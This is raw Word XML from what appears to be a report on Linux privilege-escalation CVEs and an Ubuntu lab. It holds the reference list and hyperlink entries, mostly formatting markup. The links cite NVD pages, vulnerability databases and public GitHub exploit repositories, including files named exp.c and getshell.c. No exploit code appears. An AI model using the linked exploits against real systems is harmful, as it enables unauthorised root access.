            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2022-1043</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000240">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276"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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850.3937007874017"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Same_type_object_reuse_exploits/cve-2022-1043.c at main · opensrcsec/same_type_object_reuse_exploits · GitHub </w:t>
      </w:r>
      <w:hyperlink r:id="rId47">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/opensrcsec/same_type_object_reuse_exploits/blob/main/cve-2022-1043.c</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000242">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276"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3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850.3937007874017"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GitHub - sxlmnwb/CVE-2023-0386: Vulnerabilities Exploitation On Ubuntu 22.04 </w:t>
      </w:r>
      <w:hyperlink r:id="rId48">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/sxlmnwb/CVE-2023-0386</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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245">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850.3937007874017"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Index of /mainline. (n.d.).</w:t>
      </w:r>
      <w:hyperlink r:id="rId49">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId50">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="0563c1"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://kernel.ubuntu.com/mainline/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>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247">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850.3937007874017"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CVE security vulnerability database. Security vulnerabilities, exploits, references and more. (n.d.).</w:t>
      </w:r>
      <w:hyperlink r:id="rId51">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId52">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="0563c1"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cvedetails.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000248">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="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9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850.3937007874017"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CVE - CVE. (n.d.).</w:t>
      </w:r>
      <w:hyperlink r:id="rId53">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId54">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="0563c1"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cve.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024A">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="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B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850.3937007874017"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Vulnerability &amp; Exploit database - Rapid7. (n.d.). Rapid7.</w:t>
      </w:r>
      <w:hyperlink r:id="rId55">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId56">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="0563c1"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.rapid7.com/db/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024C">
      <w:pPr>
        <w:spacing w:after="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D">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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4E">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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4F">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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Verdana"/>
  <w:font w:name="Courier New"/>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360.0" w:type="dxa"/>
      <w:jc w:val="left"/>
      <w:tblInd w:w="-115.0" w:type="dxa"/>
      <w:tblLayout w:type="fixed"/>
      <w:tblLook w:val="0600"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="3120"/>
      <w:gridCol w:w="3120"/>
      <w:gridCol w:w="3120"/>
      <w:tblGridChange w:id="0">
        <w:tblGrid>
          <w:gridCol w:w="3120"/>
          <w:gridCol w:w="3120"/>
          <w:gridCol w:w="3120"/>
        </w:tblGrid>
      </w:tblGridChange>
    </w:tblGrid>
    <w:tr>
      <w:trPr>
        <w:cantSplit w:val="0"/>
        <w:trHeight w:val="300" w:hRule="atLeast"/>
        <w:tblHeader w:val="0"/>
      </w:trPr>
      <w:tc>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3"/>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2"/>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850.3937007874017" w:hanging="359.99999999999994"/>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nvd.nist.gov/vuln/detail/CVE-2024-21626" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Azure/AKS/issues/4080" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NitroCao/CVE-2024-21626" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-0386" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-14287" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-1043" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2011-252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hyperlink" Target="https://github.com/sxlmnwb/CVE-2023-0386" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/opensrcsec/same_type_object_reuse_exploits/blob/main/cve-2022-1043.c" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kernel.ubuntu.com/mainline/"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4.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-0386#range-13084255" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/opensrcsec/same_type_object_reuse_exploits/blob/main/cve-2022-1043.c" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/opensrcsec/same_type_object_reuse_exploits/blob/main/cve-2022-1043.c" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-1043" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/opensrcsec/same_type_object_reuse_exploits/blob/main/cve-2022-1043.c" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/linux/local/cve_2022_1043_io_uring_priv_esc/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-14287" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thesecmaster.com/blog/step-by-step-procedure-to-set-up-an-active-directory-on-ubuntu" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NitroCao/CVE-2024-21626/blob/main/README.md" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-21626" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sxlmnwb/CVE-2023-0386/blob/master/fuse.c" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sxlmnwb/CVE-2023-0386/blob/master/exp.c" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sxlmnwb/CVE-2023-0386/blob/master/getshell.c" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sxlmnwb/CVE-2023-0386/blob/master/README.md" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kernel.ubuntu.com/mainline/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/" TargetMode="External"/><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image" Target="media/image16.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ubuntu.com/server/docs/introduction-to-active-directory-integration" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thesecmaster.com/blog/step-by-step-procedure-to-set-up-an-active-directory-on-ubunt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